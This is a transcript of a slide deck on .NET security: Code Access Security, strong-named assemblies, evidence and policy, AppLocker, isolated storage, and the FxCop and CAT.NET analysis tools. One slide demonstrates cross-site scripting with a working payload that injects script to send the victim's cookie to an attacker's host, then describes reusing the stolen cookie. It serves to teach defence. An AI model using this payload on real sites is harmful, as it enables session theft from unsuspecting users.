net code security including 4.0 & tools jon c. arce [email protected]
TRANSCRIPT
AgendaAvailable Tools
.NET Code Access SecurityFxCopCAT.NET
.NET Framework Security FeaturesCode Access SecurityRole-Based SecurityCryptographySecuring ASP.NET Web ApplicationsSecuring ASP.NET Web Services
.NET Code Access Security (CAS) Policy
Code Access Security (CAS) is the .NET Common Language Runtime (CLR) mechanism for maintaining security based on the identity of code.
You need to sign the code, to add EXTERNAL configuration security to the application.
Strong-Named AssembliesStrong names are
Unique identifiers (containing a public key)Used to digitally sign assemblies
Strong-named assembliesPrevent tamperingConfirm the identity of the assembly’s publisherAllow side-by-side components
sn –k MyFullKey.snk
Evidence-Based Security
EvidenceIs assessed when an assembly is loaded Is used to determine the permissions for the assemblyCan include the assembly’s:
Strong name informationURLZoneAuthenticode signature
Security Policies (up to .NET 2.0)Security Entity Description
Policy
Is set by administratorsIs enforced at runtimeSimplifies administrationContains permissionsContains code groups
Code GroupAssociates similar componentsIs evidence basedIs linked to permission set(s)
Permission Set Is a set of granted permissions
Permission Sets
Types of Security Checks
Imperative security checksCreate Permission objectsCall Permission methods
Declarative security checksUse Permission attributesApply to methods or classes
Overriding security checksUse the Assert methodPrevent the stack walk
Security Check Stack Walks
Call Stack
Security System
YourAssemblyYourAssembly
SomeAssemblySomeAssembly
.NET Framework Assembly
.NET Framework Assembly
Call to ReadFile
Call to ReadFile
Grant: Execute
1. An assembly requests access to a method in your assembly
2. Your assembly passes the request to a .NET Framework assembly
3. The security system ensures that all callers in the stack have the required permissions
4. The security system grants access or throws an exception
Grant: ReadFileGrant: ReadFile
Grant: ReadFile
Permission Demand
Security exception Access denied
Security exception Access deniedGrant access?Grant access?
Permission Requests
Used by developers to state required permissionsImplemented by attributesPrevents an assembly from loading when minimum permissions are not available//I will only run if I can call unmanaged code[assembly:SecurityPermission (SecurityAction.RequestMinimum, UnmanagedCode=true)]
Create a code group
• Control Panel
Specify Membership Condition
• Specify Membership Condition
Select a permission set
Naming the permission set
Assign permission sets
Setting File I/O permissions
Completing Code Group Creation
Security Policy in the v4 CLRIn previous releases of the .NET
Framework, CAS policy applied to all assemblies loaded into an application the major areas that are seeing updates with the v4 CLR are:
Security policy Security transparency APTCA (AllowPartiallyTrustedCallersAttribute)Evidence AppDomain Managers
http://blogs.msdn.com/shawnfa/archive/2009/05/20/net-4-0-security.aspx
Sandboxing Privileged Code
Partial Trust Web Application
Wrapper Assembly Secured Resource
Sandboxed Code<trust level_”Medium”originUri_--/>
Permissions Demanded then Asserted
AllowPartiallyTrustedCallers attribute added
Assembly installed into the global assembly cache
Resource Access
Evidence TypesEvidence Description
Application directory The application's installation directory.
Hash Cryptographic hash as SHA1.
Publisher Software publisher signature; that is, the Authenticode signer of the code.
Site Site of origin, such as http://www.microsoft.com.
Strong name Cryptographically strong name of the assembly.
URL URL of origin.
Zone origin such as Internet Zone.
AppDomain Managers
In .NET, the basic unit of execution is NOT the process, rather it is that of the Application Domain.With AppDomains, multiple applications can run in the same process, thereby sharing the .NET runtime libraries.HostSecurityManager class apply policy and permissions. This technique determines the security for the entire AppDomain at once.
Software Restriction PolicyYou can use software restriction policies to identify software and to control its ability to run on your local computer, organizational unit, domain, or site.Control the ability of software to run on your system. Permit users to run only specific files on multiuser computers. Control whether software restriction policies affect all users or just certain users on a computer.Cancel an application to run (virus)
New Software Restriction Policies
1. Sign the application
2. Set the publisher
• Publish -> Options
Windows Application Locker
AppLocker is a new feature in Windows 7 and Windows Server 2008 R2 that allows you to specify which users or groups can run particular applications in your organization based on unique identities of files. If you use AppLocker, you can create rules to allow or deny applications from running like:
executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx)
Isolated Storage
Provides a virtual file systemAllows quotasImplements file system isolation based on:
Application identityUser identity
IsolatedStorageFile isoStore = IsolatedStorageFile.GetUserStoreForAssembly();
TOOLS TO HELP WITH SECURITY
FXCop• FxCop is a code analysis tool that
checks .NET managed code assemblies for conformance to the Microsoft .NET Framework Design Guidelines. It inspect assemblies for more than 200 defects in the following areas: • Library design • Globalization• Naming conventions • Performance • Interoperability and portability• Security• Usage
FxCop demo
Microsoft Code Analysis Tool .NET
CAT.NET is a static code analysis tool like fxCop but specially built for managed code and with a strong focus on security vulnerabilities. CAT.NET scans manage code for specific security vulnerabilities like:
SQL injection LDAP injection Cross Site Scripting XPATH injection and many other categories of vulnarabilities.
CAT.NET demo
Cross Site ScriptingXSS stands for Cross Site Scripting, an XSS attack is when an attacker manages to inject Java script code or sometimes other code (usually Java Script) into a website causing it to execute the code.if an attacker made a specially crafted link and sent it to an unsuspecting victim and that victim clicked the link and a piece of Java Script code could be executed which would send the victims cookie away to a CGI Script
Cross-site scripting carried out on websites were roughly 80% of all documented security vulnerabilities as of 2007
XSS Attack !Send the victim and email, with the following HTML:
<AHREF="http://archives.cnn.com/2001/US/09/16/inv.binladen.denial/?tw=<script>document.location.replace('http://freewebhost.com/ph33r/steal.cgi?'+document.cookie);</script>">Check this Article Out! </a>
The user would of course click the link and they would be lead to the CNN News Article, but at the same time the attacker would of been able to also direct the user towards his specially crafted URL, he now has the users cookie.
Using the Firefox cookie editor the attacker copies and pastes the victims cookie and uses it for himself.
Microsoft Anti-Cross Site Scripting Library V3.0
The Microsoft Anti-Cross Site Scripting Library V3.0 (Anti-XSS V3.0) is an encoding library designed to help developers protect their ASP.NET web-based applications from XSS attacks. It differs from most encoding libraries in that it uses the white-listing technique -- sometimes referred to as the principle of inclusions -- to provide protection against XSS attacks.http://www.microsoft.com/downloads/details.aspx?familyid=051EE83C-5CCF-48ED-8463-02F56A6BFC09&displaylang=en
Session Summary
.NET Framework Security FeaturesCode Access SecurityRole-Based SecurityCryptographySecuring ASP.NET Web ApplicationsSecuring ASP.NET Web Services
Next Steps1. Stay informed about security
Sign up for security bulletins:
http://www.microsoft.com/security/security_bulletins/alerts2.asp
Get the latest Microsoft security guidance:http://www.microsoft.com/security/guidance/
2. Get additional security training Find online and in-person training seminars:
http://www.microsoft.com/seminar/events/security.mspx Find a local CTEC for hands-on training:
http://www.microsoft.com/learning/
For More Information
Microsoft Security Site (all audiences)http://www.microsoft.com/security
MSDN Security Site (developers)http://msdn.microsoft.com/security
TechNet Security Site (IT professionals)http://www.microsoft.com/technet/security
Questions and Answers
